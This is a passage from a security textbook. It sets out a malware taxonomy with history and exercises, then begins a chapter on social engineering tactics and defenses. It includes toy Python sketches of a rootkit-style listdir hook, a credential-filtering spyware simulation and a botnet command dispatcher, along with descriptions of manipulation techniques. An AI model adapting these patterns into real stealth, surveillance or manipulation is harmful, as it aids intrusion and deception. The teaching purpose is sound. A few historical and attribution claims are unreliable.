integrity, and/or availability. In other words, these software weapons address the
question “how bad could it possibly be?”
Karresand developed a taxonomy to categorize malware (Karresand, 2002). The
most insightful parts of this taxonomy are the following dimensions:
Type: Atomic (simple) / Combined (multi-faceted)
Violates: Confidentiality / Integrity / Availability
Duration of Effect: Temporary / Permanent
Targeting: Manual (human intervention) / Autonomous (no human intervention)
Attack: Immediate (strikes upon infection) / Conditional (waits for an event)
Rabbit
Type: any
Violates: Availability
Duration: any
Targeting: Autonomous
Attack: any
A rabbit is a malware payload designed to consume resources. In other words,
“rabbit” is not a classification of a type of malware, but rather a type of payload
or a property of malware. Usually malware is a rabbit and something else (such
as a bomb). Traditionally the motivation behind a rabbit attack is to deny valid
users of the system access.
For a program to exhibit rabbit functionality, the following condition must be
met:
Bomb
Type: any
Violates: any
Duration: any
Targeting: any
Attack: Conditional
A bomb is a program designed to deliver a malicious payload at a pre-specified
time or event. This payload could attack availability (such as deleting files or
causing a program to crash), confidentiality (installing a key-logger), or integrity
(changing the settings of the system). Like a rabbit, a bomb is not so much a form
of malware as it is a characteristic of the malware payload.
For a program to exhibit bomb functionality, the following condition must be met:
- The payload must be delivered at a pre-specified time/event: Most bombs are
  designed to deliver their payload on a given date. Some wait for an external
  signal while others wait for a user-generated event.
Adware
Type: Atomic
Violates: Availability
Duration: Permanent
Targeting: Autonomous
Attack: Immediate
Adware is a program that serves advertisements and redirects web traffic in an
effort to influence user shopping behavior. Originally adware was simple,
periodically displaying inert graphics representing some product or service,
similar to what a billboard or a commercial would do. Today adware is more
sophisticated, tailoring the advertisement to the activities of the user, tricking
the user into viewing different content than was intended (typically through
search engine manipulation), and giving the user the opportunity to purchase the
goods or services directly from the advertisement. For a program to be classified
as adware, the following conditions must be met:
- It must present advertisements: The user must be exposed to some solicitation
  to purchase goods or services.
- The message must not be presented by user request or action: When viewing a
  news website, the user agrees to view the advertisements on the page. This is
  part of the contract with viewing free content; the content is paid for by the
  advertisements. Adware has no such contract; the user is exposed to ads
  without benefit.
- The user must not have an ability to turn it off: Adware lacks the functionality
  to uninstall, disable, or otherwise suppress advertisements.
2000-2004 All major web browsers included functionality to limit or eliminate
pop-up ads. Though adware was quite popular in the late 1990s through popups,
they became almost extinct with the advent of effective pop-up blockers. Adware
is rarely found in malware today.
Trojan
Type: Combined
Violates: any
Duration: Permanent
Targeting: Manual
Attack: Immediate
The story goes that the ancient Greeks were unsuccessful in a 10-year siege of
the city of Troy through traditional means. The leader of the Greek army was
Epeius. In an apparent peace offering to Troy, Epeius created a huge wooden
horse (the horse being the mascot of Troy) and wheeled it to the gate of the city.
Engraved on the horse were the words “For their return home, the Greeks
dedicate this offering to Athena.” Unbeknownst to the citizens of Troy, there was
a small contingent of elite Greek troops hidden therein. The Trojans were fooled
by this ploy and wheeled the horse into their gates. At night while the Trojans
slept, the Greek troops slipped out, opened the gate, and Troy was spoiled.
A trojan horse is a program that masquerades as another program. The purpose
of the program is to trick the user into thinking that it is another program or that
it is a program that is not malicious. Common payloads include: spying, denial of
service attacks, data destruction, and remote access. For a piece of malware to
be classified as a trojan, the following condition must be met:
- It must masquerade as a legitimate program: At the point in time when the
  victim executes the program, it must appear like a program the victim believes
  to be useful. This could mean it pretends to be an existing, known program. It
  could also mean it pretends to be a useful program that the user has previously
  not seen.
Ransomware
Type: Atomic
Violates: Availability
Duration: Permanent
Targeting: Manual
Attack: any
Ransomware is a type of malware designed to hold a legitimate user’s
computational resources hostage until a price (called the ransom) is paid to
release them. While any type of computational resource could be held hostage
(such as network bandwidth, CPU cycles, and storage space), the most common
target is data files. For a program to be classified as ransomware, the following
conditions must be met:
- It must collect assets and deny their use to legitimate users on the system:
  The software needs to find the resources and put them under guard so they
  cannot be used without permission from the attacker. This is typically
  accomplished through encryption, where a strong enough key is used that the
  victim cannot crack it through brute-force guessing.
- It must solicit the user for funds: The software needs to inform the user that
  the resources are ransomed and provide a way for the user to free them. This
  can be done through a simple text file placed where the victim’s resources
  used to reside. The most commonly used payment mechanisms today are
  Bitcoin and PayPal.
- It must release the resources once the fees have been paid: If the resources
  are simply destroyed or never released, then the malware would be classified
  as a rabbit or bomb. Today, the release mechanism is typically the
  presentation of the encryption password.
Back Door
Type: any
Violates: any
Duration: Permanent
Targeting: Autonomous
Attack: Immediate
A back door is a mechanism allowing an individual to enter a system through an
unintended and illicit avenue. Traditionally, back doors were created by system
programmers to allow reentry regardless of the system administrator’s policies.
Today, back doors are used to allow intruders to re-enter compromised systems
without having to circumvent the traditional security mechanisms. For a program
to exhibit back door functionality, the following conditions must be met:
- It must allow unintended entry into a system: Most systems allow legitimate
  users access to system resources. A back door allows unintended users access
  to the system through a non-standard portal.
- The user must not have an ability to turn it off: Even if a user can detect a
  back door, there must not be an easy way (aside from reformatting the
  computer) to remove it. Consider a default administrator password on a
  wireless router. If the owner never resets it, it satisfies two of the criteria for
  a back door: it allows unintended access and the typical user would not be
  able to detect it. However, since it is easily disabled, it does not qualify as a
  back door.
Virus
Type: Atomic
Violates: any
Duration: Permanent
Targeting: Manual
Attack: any
Possibly the most common type of malware is a virus. Owing to its popularity and
the public’s (and media’s) ignorance of the subtleties of various forms of malware,
the term “virus” has become synonymous with “malware.” A virus is a
classification of malware that spreads by duplicating itself with the help of human
intervention. Initially, viruses did not exist as stand-alone programs. They were
fragments of software attached to a host program that they relied upon for
execution. This stipulation was removed from the virus definition in part due to
the deprecation of that spreading mechanism and in part due to evolving public
understanding of the term. Today we understand viruses to have two properties:
- It must replicate itself: There must be some mechanism for it to reproduce and
  spread. Some viruses modify themselves on replication so no two versions are
  identical. This process, called polymorphism, is done to make virus detection
  more difficult.
Worm
Type: Atomic
Violates: Availability
Duration: any
Targeting: Autonomous
Attack: Immediate
A worm is similar to a virus with the exception of the relaxation of the constraint
that human intervention is required. The typical avenue of spreading is to search
the network for connected machines and spread as many copies as possible.
Common spreading strategies include random IP generation, reading the user’s
address book, and searching for computers directly connected to the infected
machine. For a piece of malware to be classified as a worm, two properties must
exist:
- It must replicate itself: There must be some mechanism for it to reproduce and
  spread. The primary spreading mechanism of worms is the Internet.
- Requires no human intervention: The worm interacts only with software
  running on target machines. This means that worms spread much faster than
  viruses.
SPAM
Type: Atomic
Violates: Availability
Duration: Temporary
Targeting: Manual
Attack: Immediate
SPAM is defined as marketing messages sent on the Internet to a large number
of recipients. In other words, SPAM is a payload (such as a bomb, rabbit,
ransomware, or adware) rather than a delivery mechanism (such as a virus,
worm, or trojan). Note that “spam” and “Spam” refer to the food, not the
malware.
For a piece of e-mail to be classified as SPAM, the following conditions must be
met:
- It must be a form of electronic communication: Though SPAM is typically
  e-mail, it could be in a blog, a tweet, a post on a newsgroup or a discussion
  board, or any other form of electronic communication. Print SPAM is called
  junk mail.
- It must be undesirable: The recipient must not have requested the message.
  If, for example, you have registered for a product and have failed to de-select
  (or opt out of) the option to get a newsletter, then the newsletter is not SPAM.
  There is often a fine line between SPAM and legitimate advertising e-mail.
Rootkit
Type: Combined
Violates: any
Duration: Permanent
Targeting: Autonomous
Attack: Immediate
“Root” is the Unix term for the most privileged class of user on a system.
Originally, “rootkit” was a term associated with software designed to help an
unauthorized user obtain root privilege on a given system. The term has morphed
with modern usage. Today, “rootkit” refers to any program that attempts to hide
its presence from the system. A typical attack vector is to modify the system
kernel in such a way that none of the system services can detect the hidden
software. For a program to exhibit rootkit functionality, the following condition
must be met:
- It must hide its existence from the user and/or operating system: The
  fundamental characteristic of a rootkit is that it is difficult to detect or remove.
  Note that many other forms of malware could exhibit rootkit functionality.
  For instance, all botware are also rootkits.
Rootkits themselves are not necessarily malicious. The owner of a system (such
as the manager of a kiosk computer in an airport terminal) may choose to install
a rootkit to ensure they remain in control of the system. More commonly, rootkits
are tools used by black hats to maintain control of a machine that was previously
cracked. The most popular rootkits of the last decade (such as NetBus and Back
Orifice 2000) are the underpinnings of modern botnet software. Rootkits as
stand-alone applications are thus somewhat rare today:
1986 Many consider the Brain virus to be the first wide-spread malware exhibiting rootkit
functionality. It infected the boot sector of the file system, thereby avoiding
detection.
1998 NetBus was developed by Carl-Fredrik Neikter to be used (claimed the author) as
a prank. It was quickly utilized by malware authors.
1999 The NTRootkit was the first to hide itself in the Windows NT kernel. It is now
detected and removed by the Windows Defender antivirus tool that comes with
the operating system.
2004 Special-purpose rootkits were installed on the Greek Vodafone telephone
exchange, allowing the intruders to monitor the calls of about 100 Greek
government officials and other high-ranking individuals.
2005 Sony BMG included a rootkit in the release of some of their audio CDs which
disabled MP3 ripping. The rootkit was
discovered and resulted in a public relations nightmare for the company.
2010 Google Redirect virus is a rootkit that hijacks search queries from popular search
engines (not limited to Google) and sends them to malicious sites or paid
advertisers. Because it infects low-level functions in the operating system, it is
difficult to detect and remove.
Rootkits are rarely found in the wild as stand-alone programs today. Instead, they
are incorporated in more sophisticated botware.
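A kernel rootkit hooks system services so that queries about files and processes return doctored results. The same hooking pattern can be sketched harmlessly in user space. In the Python sketch below, the `HIDDEN_PREFIX` marker and the act of patching `os.listdir` are purely illustrative stand-ins for kernel-level hooks, not a real attack technique:

```python
import os

HIDDEN_PREFIX = "rk_"  # hypothetical marker for files the "rootkit" conceals

# Keep a reference to the genuine implementation, then replace it with a
# wrapper -- the same hooking pattern a kernel rootkit applies to system calls.
_real_listdir = os.listdir

def hooked_listdir(path="."):
    """Return the real listing minus any entries the rootkit wants hidden."""
    return [name for name in _real_listdir(path)
            if not name.startswith(HIDDEN_PREFIX)]

os.listdir = hooked_listdir  # every later caller now sees the filtered view
```

Any code that subsequently calls `os.listdir` receives the censored view, which is exactly why rootkit detection tools compare the answers of high-level services against raw reads of the underlying data.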
Spyware
Type any
Violates Confidentiality
Duration Permanent
Targeting Autonomous
Attack Immediate

Spyware is a program hiding on a computer for the purpose of monitoring the activities of the user. In other words, spyware is a payload (like a rabbit, bomb, adware, ransomware, or SPAM) rather than a delivery mechanism (like a Trojan, virus, or worm). Spyware frequently has other functionality, such as redirecting web traffic or changing computer settings. Many computers today are infected with spyware, and most users are unaware of it.
For a program to be classified as spyware, the following conditions must be met:
It must collect user input
This input could include data from the keyboard, screen-shots, network communications, or even audio.

It must send the data to a monitoring station
Some party other than the user must gather the data. This data could be in a raw form directly from the user input or it may be in a highly filtered or processed state.

It must hide itself from the user
The user should be unaware of the presence of the data collection or transmission.
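The first two conditions can be sketched as a benign simulation. Here the "monitoring station" is just an in-memory queue and the credential filter terms are invented for illustration; real spyware would capture genuine keystrokes and exfiltrate them over the network:

```python
from collections import deque

# A benign stand-in for a remote monitoring station: real spyware would
# transmit over the network; here we just queue the records locally.
monitoring_station = deque()

CREDENTIAL_HINTS = ("password", "pin", "ssn")  # hypothetical filter terms

def capture(keystrokes: str) -> None:
    """Condition 1: collect user input (here, one line of typed text)."""
    # Condition 2: the data may be filtered before being sent on --
    # only lines that look credential-related are forwarded.
    if any(hint in keystrokes.lower() for hint in CREDENTIAL_HINTS):
        monitoring_station.append(keystrokes)
    # Condition 3 (hiding from the user) is what separates spyware from an
    # ordinary logger; a simulation cannot meaningfully demonstrate it.
```

The filtering step matters in practice: sending every keystroke in raw form is noisy and easy to detect, so processed or filtered data is the more common exfiltration pattern.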
Monitoring software can be high or low consent, and have positive or negative consequences. Spyware resides in only one of these quadrants:

                       High Consent       Low Consent
Positive Consequence   Overt Provider     Covert Supporter
Negative Consequence   Double Agent       Spyware
A brief history of spyware:
1995 First recorded use of the word “spyware” referring to an aspect of Microsoft’s
business model.
1999 The term “spyware” was used by Zone Labs to describe their personal firewall
(called Zone Alarm Personal Firewall).
1999 The game “Elf Bowling” was a popular freeware game that circulated on the
early Internet. It contained some spyware functionality, sending personal
information back to the game’s creator, Nsoft.
1999 Steve Gibson of Gibson Research developed the first anti-spyware: OptOut.
2012 Flame is discovered. It is a sophisticated and complex piece of malware designed
to perform cyber espionage in Middle East countries. It almost certainly was
developed by a state, making it an artifact of the third generation of hackers.
2013 Gameover ZeuS is a spyware program that notices when the user visits certain
web pages. It then steals the user’s credentials and sends them to a master
server. Modern versions of Gameover ZeuS have been integrated into the Cutwail botnet.
Botware
Type Combined
Violates any
Duration Permanent
Targeting Autonomous
Attack Immediate

Botware (also called Zombieware or Droneware) is a program that controls a system over a network. When a computer is infected with botware, it is called a bot (short for “robot”), zombie, or drone. Often many computers controlled by the same botware form a botnet. Though botnets can be used for a variety of malicious purposes, a common attack vector is called a Distributed Denial of Service (DDoS) attack, where multiple bots send messages to a target system. These attacks flood the network from many locations, serving to exclude valid traffic and making the attack very difficult to stop. For a piece of malware to be classified as botware, the following conditions must be met:
It must have a remote control facility
Bots receive orders from the owner through some remote connection. This remote connection has evolved in recent years from simple Internet Relay Chat (IRC) listeners, to elaborate command-and-control mechanisms, to today’s peer-to-peer networks.

It must implement several commands
Each bot is capable of executing a wide variety of commands. Common examples include spyware functionality, sending SPAM, and self-propagation.

It must hide its existence
Because the value of a botnet is tied to its size, an essential characteristic of any botware is to hide its existence from the owner of the machine on which it resides.
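The remote-control and multiple-command conditions can be sketched as a command dispatcher. The command names and the in-memory list standing in for a command-and-control channel are illustrative; a real bot would pull its orders over IRC, HTTP, or a peer-to-peer overlay, and its handlers would do actual harm rather than return strings:

```python
# A minimal sketch of the bot side of a command-and-control loop.

def handle_spam(arg):      return f"would send SPAM to {arg}"
def handle_flood(arg):     return f"would flood {arg} with traffic"
def handle_propagate(arg): return f"would copy itself to {arg}"

# "Implements several commands" -- one defining botware condition.
COMMANDS = {"spam": handle_spam, "flood": handle_flood,
            "propagate": handle_propagate}

def bot_loop(channel):
    """Read (command, argument) orders from the channel until 'quit'."""
    log = []
    for command, argument in channel:
        if command == "quit":
            break
        handler = COMMANDS.get(command)
        if handler:                      # silently ignore unknown orders
            log.append(handler(argument))
    return log

# Example: orders arriving from a hypothetical controller
orders = [("spam", "victim@example.com"), ("flood", "203.0.113.9"), ("quit", "")]
```

The dispatch-table structure is why botnets are so flexible: adding a new capability to the whole botnet is just a matter of pushing one more handler to every bot.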
SEO
Type Atomic
Violates Integrity
Duration Temporary
Targeting Autonomous
Attack Immediate

Search Engine Optimization (S.E.O.) is not strictly a form of malware because it is commonly used by eCommerce websites to increase the chance a user will find their site on a search engine (Brin & Page, 1998). However, when individuals use questionable tactics to unfairly increase their ranking or damage that of a competitor, it qualifies as a black hat technique. For a web page to exhibit malicious SEO characteristics, the following condition must be met:
It must inflate its prominence on a search result
The properties of the web page must make it appear more important to a web crawler than it actually is. This, in turn, serves to mislead search engine users into thinking the page is more relevant than it is.
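Search engines counter inflated prominence with heuristics. As an illustration, here is a toy keyword-density check of the kind a crawler might apply to flag keyword stuffing; the threshold value is invented, and no real engine publishes its cutoffs:

```python
import re

def keyword_density(page_text: str, keyword: str) -> float:
    """Fraction of all words on the page that are the given keyword."""
    words = re.findall(r"[a-z']+", page_text.lower())
    if not words:
        return 0.0
    return words.count(keyword.lower()) / len(words)

STUFFING_THRESHOLD = 0.25  # illustrative cutoff, not from any real engine

def looks_stuffed(page_text: str, keyword: str) -> bool:
    """Flag pages whose keyword density is implausibly high."""
    return keyword_density(page_text, keyword) > STUFFING_THRESHOLD
```

A page repeating “cheap flights” in nearly every phrase would trip this check, while a page that discusses the topic in ordinary prose would not; real engines combine many such signals rather than relying on one ratio.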
Examples
1. Q Name all the types of malware that can only function with human intervention.
2. Q Name all the types of malware that are stealthy by their very nature.
3. Q Name the malware that was designed to activate a payload on May 13th, 1988.
Exercises
1 From memory, 1) name as many types of software weapons as you can, 2)
define the malware, 3) list the properties of the malware.
4 List all the types of malware that are designed to hide their existence from the
user.
5 List all the types of malware that cannot hide their existence from the user.
8 Categorize the following malware:
This malware spreads through e-mail channels. The user is tricked into clicking
a link which takes them to a compromised web site. When the page loads, a
buffer overrun vulnerability in the browser allows software to be installed which
sends a copy of the message to all the individuals in the user’s address book.
Problems
1 Is a joke a virus?
2 “There are no viruses on the Macintosh platform.” Where does this perception
come from? Do you agree or disagree?
3 Identify a recent malware outbreak. Find three sources and write a “one page”
description of the malware.
5 Which type of software weapon is most common today? Find one or two
sources supporting your answer.
7 Is there a correlation between type of software weapon and type of black hat?
In other words, is it true (for example) that information warriors are most likely
to use SEO and criminals are most likely to use spyware? Find one or two sources
supporting your answer.
8 Is there a correlation between the type of software weapon and the information
assurance it targets? Describe that correlation for all the types of weapons.
Chapter 04: Social Engineering
A critical component of any secure system is the set of human actors interacting with it. If the users can be tricked into compromising the system, then no amount of software protection is of any use. The main objective of this lesson is to understand how people can be tricked into giving up their assets and what can be done to prevent that from happening.
Up to this point, we have discussed how C.I.A. assurances can be provided to the
client at the upper half of the OSI model. Specifically, we have focused on
confidentiality and integrity assurances on the application, presentation, and
session layers. Social engineering is unique because it mostly occurs one level
above these; it happens at the person or user layer. Social engineering has many
definitions:
Instead of attacking a computer, social engineering is the act of interacting and
manipulating people to obtain important/sensitive information or perform an act
that is latently harmful. To be blunt, it is hacking a person instead of a computer.
(UCLA, How to Prevent Social Engineering, 2009)
This next definition is one that your grandmother would understand.
Talking your way into information that you should not have.
(Howard & Longstaff, 1998)
The following definition is interesting because it focuses on the malicious aspect.
Social engineering is a form of hacking that relies on influencing, deceiving, or
psychologically manipulating unwilling people to comply with a request.
(Kevin Mitnick, CERT Podcast Series, 2014)
Each of these definitions has the same components: using social tactics to elicit
behavior that the target individual did not intend to exhibit. These tactics can be
very powerful and effective:
Many of the most damaging security penetrations are, and will continue to be,
due to social engineering, not electronic hacking or cracking. Social engineering is
the single greatest security risk in the decade ahead.
(The Gartner Group, 2001)
Possibly Schneier put it best: “Only amateurs attack machines; professionals
target people.” The earliest written record of a social engineering attack can be
found in the 27th chapter of Genesis. Isaac, blind and well advanced in years, was
planning to give his Patriarchal blessing to his oldest son Esau. Isaac’s wife
Rebekah devised a plan to give the blessing to Jacob instead. Jacob initially
expressed doubt: “behold, my brother Esau is a hairy man, and I am a smooth
man. Perhaps my father will feel me and I shall seem to be mocking him, and bring
a curse upon myself and not a blessing (Genesis 27:11-12).” Rebekah dressed
Jacob in a costume consisting of Esau’s clothes and fur coverings for his arms and
neck to mimic the feel of Esau’s skin. The ruse was successful and Jacob tricked
his father into giving him the blessing.
The effectiveness of social engineering tactics was demonstrated at a recent DefCon hacking conference. So confident were the attackers that they would be successful that they put a handful of social engineers in a Plexiglass booth and asked them to target 135 corporate employees. Of the 135, only five were able to resist these attacks.
From the context of computer security, the two most important aspects of social
engineering are the general methodologies involving only the interaction
between people, and the special forms of social engineering that are possible only
when technology mediates the interaction.
Attacks
Social engineering attacks are often difficult to identify because they are subtle
and varied. They all, however, relate to vulnerabilities regarding how individuals
socialize. Presented with certain social pressures, people have a tendency to be
more trusting than the situation warrants. Social engineers create social
environments to leverage these social pressures in an effort to compel individuals
to turn over assets.
Confidence men and similar social engineers have developed a wide variety of
tactics through the years that are often very creative and complex. Cialdini
identified the six fundamental techniques used in persuasion: commitment,
authority, reciprocation, reverse social engineering, likening, and scarcity.
Conveniently, this spells C.A.R.Re.L.S. (Cialdini, 2006).
Commitment
Preying on people’s desire to follow through with promises, even if the promise was not deliberately made.

Authority
Appearing to hold a higher rank or influence than one actually possesses.

Reverse Engineering
Creating a problem, advertising the ability to solve the problem, and operating in a state of heightened authority as the original problem is fixed.
Commitment
Commitment attacks occur when the attacker tricks the victim into making a
promise which he or she will then feel obligated to keep.
Commitment relies on our desire to be perceived as trustworthy

Society also places great store by consistency in a person’s behavior. If we promise to do something, and fail to carry out that promise, we are virtually certain to be considered untrustworthy or undesirable. We are therefore likely to take considerable pains to act in ways that are consistent with actions that we have taken before, even if, in the fullness of time, we later look back and recognize that some consistencies are indeed foolish.
While commitment attacks leverage people’s desire to be seen as trustworthy,
the real vulnerability occurs because people have a tendency to not think through
the ramifications of casual promises. After all, what harm can come when you
make a polite, casual promise? This opens a window in which the attacker can use
subtle social pressure to persuade the victim to honor the commitment.
Commitment attacks can be mitigated by avoiding making casual commitments
and abandoning a commitment if it is not advantageous to keep it. Remember,
an attacker will not actually be offended if a commitment is not met; in most
cases he tricked the victim into making the commitment in the first place.
A young man walks into a car dealership and asks to test drive a car. When he
returns, the salesman asks if he likes the car. The young man replies that he does
and politely describes a few things that he likes about it. A few minutes later, the
young man starts to leave the dealership. The salesman insists “… but you said
you liked the car…”
Conformity
One special type of commitment is conformity: leveraging an implied
commitment made by society rather than by the individual. People tend to avoid
social awkwardness resulting from violating social norms of niceties, patience, or
kindness. Conformity may also be related to likening, in which case it is often called
peer pressure. Conformity may refer to implicit social commitments as well as
explicit commitments. These expectations and promises may come from society,
family, coworkers, friends, religious groups, or a combination of these.
A waiter gives a customer poor service. Feeling a bit put-off, the customer decides
to give the waiter a poor tip. When it comes time to pay the bill, the waiter
pressures the customer to give the customary 15% tip by collecting the bill in
person.
Authority
Authority is the process of an attacker assuming a role of authority which he does
not possess. It is highly effective because:
Authority relies on our habit of respecting rank

People are highly likely, in the right situation, to be highly responsive to assertions of authority, even when the person who purports to be in a position of authority is not physically present.
(Cialdini, 2006)
Authority ploys are among the most commonly used social engineering tactics.
Three common manifestations of authority attacks are impersonation, diffusion
of responsibility, and homograph attacks.
Impersonation
Impersonation is the process of assuming the role of someone who normally
should, could, or might be given access. Attackers often adopt roles that gain
implicit trust. Such roles may include elements of innocence, investigation,
maintenance, indirect power, etc.
A bank robber is seeking more detailed information about the layout of a local
bank before his next “operation.” He needs access to parts of the building that are
normally off-limits. To do this, he wears the uniform of a security guard and walks
around the bank with an air of confidence. He even orders the employees around!
A fake e-mail designed to look like it originated from your bank is an
impersonation attack. Impersonation attacks are easy to mitigate: authenticate
the attacker. Imposters are unable to respond to authentication demands while
individuals with genuine authority can produce credentials.
Diffusion of Responsibility
A diffusion of responsibility attack involves an attacker manipulating the decision-
making process from one that is normally individual to one that is collective. The
attacker then biases the decision process of the group to his advantage. For
example, consider an attacker trying to dissuade a group of people from eating
at a restaurant. Normally this is an individual decision. The attacker first makes it
a group decision by starting a discussion with the group. Initially everyone equally
offers their opinion about the restaurant, subtly changing the social dynamic of
the decision from an individual one to a collective one. The attacker then
becomes the leader of the discussion (which is easy because he started it) and
introduces his opinion. There now exists a social pressure for all members of the
group to avoid the restaurant even though some of the individuals may have
intended to go inside. Diffusion of responsibility works because people have a
tendency to want to share the burden and consequences of uncertain or risky
decisions. They become willing to give the leadership role to anyone willing to
take this responsibility, especially when there is a lack of a genuine authority
figure.
Reciprocation
Reciprocation attacks occur when an attacker gives the victim a gift and the victim feels a strong social pressure to return some type of favor. This pressure occurs even if the gift was not requested and even if the only possible way to reciprocate the gift is with one of vastly greater value.

Reciprocation relies on our desire to pay back acts of kindness

A well-recognized rule of social interaction requires that if someone gives us (or promises to give us) something, we feel a strong inclination to reciprocate by providing something in return. Even if the favor that someone offers was not requested by the other person, the person offered the favor may feel a strong obligation to respect the rule of reciprocation by agreeing to the favor that the original party offers or asks in return - even if that favor is significantly costlier than the original favor.
(Cialdini, 2006)
Two strong social forces are at work in reciprocation attacks. The first is that
society strongly disapproves of those failing to repay social debts. The attacker
attempts to leverage this force by creating a social situation where the victim
would feel pressure or feel indebted to the attacker if he did not reciprocate a
gift. To mitigate this attack, the victim needs to recognize the social pressure and
consciously reject it.
The second social force at work in reciprocation attacks is gratitude. When people
receive a gift, especially an unexpected gift or a gift of high value, most feel
gratitude. A common way to express gratitude is to return a gift to the original
giver. The attacker attempts to leverage this force by creating a social situation
where the victim is made to feel gratitude toward the attacker so that he will want
to do something for the attacker in return. Of course, the most appropriate way to
handle this is to say “thank you.” However, the social engineer will create a
situation where a more convenient and perhaps more satisfying answer would be
to make an unwanted purchase or overlook an inconvenient security procedure.
To mitigate this force, the victim needs to recognize that any expression of
gratitude is appropriate, not just the one proposed by the attacker. If this
expression would result in a violation of company policy or place the victim in a
disadvantaged economic position, it must be suppressed or a different outlet
must be contemplated.
A young couple is interested in purchasing their first car together. As they drive up
to the first car dealership, a salesman greets them at their car. He is very friendly
and helpful, using none of the traditional salesman pressure tactics. After a few
minutes, the couple finds a car they like. The salesman hands them the keys and
tells them to take the car for the weekend. “The WHOLE weekend?” the wife asks.
A few days later, the couple comes to return the car. They feel a great deal of
gratitude for how kind the salesman was to them, how fun he made the car
shopping process, and for letting them put so many miles on a brand new car. If
only there was a way to say “thank you…”
Reverse Social Engineering
Another category of social engineering attacks is reverse social engineering, an
attack where the aggressor tricks the victim into asking him for assistance in
solving a problem. Reverse social engineering attacks occur in three stages:
Sabotage The attacker creates a problem compelling the victim to action. The problem can
be real, resulting from sabotage of a service on which the victim depends, or it
can be fabricated, where the victim is merely led to believe that assistance is required.
Advertise The next stage occurs when the attacker advertises his willingness and capacity
to solve the problem. In almost all cases, the Advertise phase requires an
Authority attack for it to work.
Assist The final phase occurs when the attacker requests assistance from the victim to
solve the problem. This assistance typically involves requests for passwords or
access to other protected resources, the target of the attack.
Likening
Likening is the process of an attacker behaving in a way to appear similar to a
member of a trusted group. Likening attacks are often successful because people
prefer to work with people like themselves.
Likening relies on our tendency to trust people similar to ourselves

Our identification of a person as having characteristics identical or similar to our own — places of birth, or tastes in sports, music, art, or other personal interests, to name a few — provides a strong incentive for us to adopt a mental shortcut, in dealing with that person, to regard him or her more favorably merely because of that similarity.
(Cialdini, 2006)
Likening attacks are distinct from authority attacks in that the attacker is not
imitating an individual possessing rank or authority. Instead, the attacker is
attempting to appear to be a member of a group of people trusted or liked by the
victim. While authority attacks result in the victim granting the attacker privileges
associated with position or title, likening attacks result in the victim going out of
his way to aid and abet the attacker. The victim wants to do this because, if their
roles were reversed, the victim would want the same help from a friend.
Perhaps the most famous con-man who relied primarily on likening attacks was Victor Lustig, a con-man operating in France who successfully sold the Eiffel Tower to a French scrap dealer in 1925. His “Ten Commandments for Con Men” include many
likening strategies:
• Wait for the other person to reveal any political opinions, then agree with them.
• Let the other person reveal religious views, then have the same ones.
• Be a patient listener.
• Never look bored.
• Never be untidy.
• Never boast.
Likening attacks can be mitigated by the victim being suspicious of overtures of
friendship and not granting special privileges or favors to friends. This,
unfortunately, makes it difficult for an individual to be resistant to likening social
engineering attacks while at the same time being a helpful employee.
Sam is a secretary working for a large company. Just before lunch, a delivery man
comes to drop off some sensitive papers to a member of the organization.
Company policy states that only employees are allowed in the office area, but this
delivery man wants to hand-deliver the papers. As the delivery man converses
with Sam, it comes out that they grew up in the same small town and even went
to the same college. They have so much in common! Of course he will trust a fellow
Viking with something like this!
Scarcity
Scarcity attacks occur when the attacker is able to introduce the perception of
scarcity of an item that is of a high perceived value. This is usually effective
because:
Scarcity relies on our desire to not miss an opportunity

People are highly responsive to indications that a particular item they may want is in short supply or available for only a limited period.
(Cialdini, 2006)
Scarcity attacks are common because they are so easy to do. It is easy for an
attacker to say that a valuable item is in short supply. It is easy for an attacker to
claim that the only time to act is now. Scarcity attacks are also easy to defeat. In
most cases, it is easy to verify if the Scarcity claim is authentic (the item really is
in short supply) or if the claim is fabricated.
Rushing
One common form of scarcity attack is rushing. Rushing involves the attacker
putting severe time constraints on a decision. Common strategies include time
limits, a sense of urgency, emergencies, impatience, limited or one-time offers,
or pretended indecision. In each case, social pressure exists to act now. Rushing
attacks are powerful because, like all scarcity attacks, they prey on people’s
inherent desire to not miss an opportunity. The more the attacker can make the
victim feel that they must act now, the more desirable the attacker can make
the action appear to the victim. This attack can be mitigated by being
aware of this effect and the victim asking himself if the action would be equally
desirable without the rushing. Rushing attacks have an additional effect beyond
that of other scarcity attacks. When the victim is placed under extreme time
pressure, he is forced to make decisions differently than he normally would. This
serves to “throw him off” and makes his decision-making process less sure. This
effect can be mitigated by the victim refusing to alter his decision-making process
through artificial pressures imposed by the attacker.
Sam is on his lunch break and is passing the time by browsing the web while he
munches on his sandwich. Where should he take his family on vacation this year?
After a while, he stumbles on a very interesting resort in the Bahamas. The
pictures are fantastic! Just as he is about to click away, a notification appears on the screen: an all-inclusive package is now half off. Unfortunately, the offer is only good for one hour (and a count-down timer appears on the screen).
Sam was not planning on making a commitment right now. A quick call to his wife
does not reach her. Normally he would never make such an expensive decision
without her opinion. However, because the offer is quickly expiring…!
Defenses
The simplest and most effective defense against social engineering attacks is
education. When a target is aware of the principles of social engineering and is
aware an attack is underway, it is much more difficult to be victimized. Often,
however, a more comprehensive strategy is required. This is particularly
important where high-value assets are at risk or when the probability of an attack
is high.
Comprehensive anti-social engineering strategies are multi-layered where each
layer is designed to stop all attacks. The levels are: Training, Reaction, Inoculation,
Policy, and Physical (for T.R.I.P.P.) (Gragg, 2003).
Training
The training layer consists of educating potential victims of social engineering
attacks about the types of strategies that are likely to be used against them. This
means that every individual likely to face an attack should be well versed in how
to defend themselves, be aware of classic and current attacks, and be constantly
reminded of the risk of such attacks. They should also know that friends are not
always friends, passwords are highly personal, and uniforms are cheap. Security
awareness should be a normal, enduring aspect of employment. Education is a
critical line of defense against social engineering attacks.
Reaction
The next layer is reaction, the process of recognizing an attack and moving to a
more alert state. Perhaps a medical analogy best explains reaction. The self-
defense mechanisms built into the immune system of the human body include
the ability to recognize that an attack is underway and to increase scrutiny. This
is effective because attacks seldom occur in isolation; the existence of a single
germ in your body is a good indication other germs are present as well. An
organization should also have reaction mechanisms designed to detect an attack
and be on guard for other components of the same attack.
Reaction mechanisms consist of a multi-step process: detecting an attack is
underway, reporting or sending an alarm to alert others, and an appropriate
response.
Detection Reaction involves early-detection. The detection system can be triggered by
individuals asking for forbidden information, rushing, name dropping, making
small mistakes, asking odd questions, or any other avoidance or deviation from
normal operations. All employees should be part of the early-detection system
and know where to report it.
Reporting Reaction also involves a central reporting system. All reports should funnel
through a single location where directions flow through the appropriate
channels. Commonly, a single person serves as the focal point for receiving and
disseminating reports.
Response Response to a social engineering attack could be as simple as an e-mail to
affected parties. However, the response can be more in-depth, such as a security
